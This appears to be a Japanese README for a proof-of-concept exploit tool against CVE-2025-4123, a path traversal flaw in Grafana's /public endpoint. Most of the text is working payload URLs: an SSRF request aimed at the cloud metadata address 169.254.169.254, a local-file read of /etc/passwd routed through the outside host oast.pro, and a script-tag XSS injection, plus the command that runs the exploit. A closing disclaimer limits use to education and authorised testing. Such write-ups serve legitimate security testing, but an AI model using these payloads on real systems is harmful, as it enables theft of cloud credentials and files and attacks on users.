
CVE-2025-4123 - Grafana ツール
mitsec によって開発されました
これは CVE-2025-4123 用の概念実証 (PoC) エクスプロイトツールです。CVE-2025-4123 は、Grafana の /public エンドポイントにおける深刻なパストラバーサル脆弱性です。このエクスプロイトにより、次のことが可能になります:
Grafana インスタンスのうち、/public/ エンドポイントが次のようなエンコードされたパスを不適切に処理するもの:
/public/..%2F%5coast.pro%2F%3f%2F..%2F..
python3 cve_2025_4123_exploit_mitsec_final.py
次に、目的のモードを選択します:
169.254.169.254 などの内部サービス/etc/passwd などのファイルを読み取り[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL: http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL: http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
このコードは教育目的および許可されたテスト目的でのみ提供されています。同意なしにシステムに対して不正に使用することは違法です。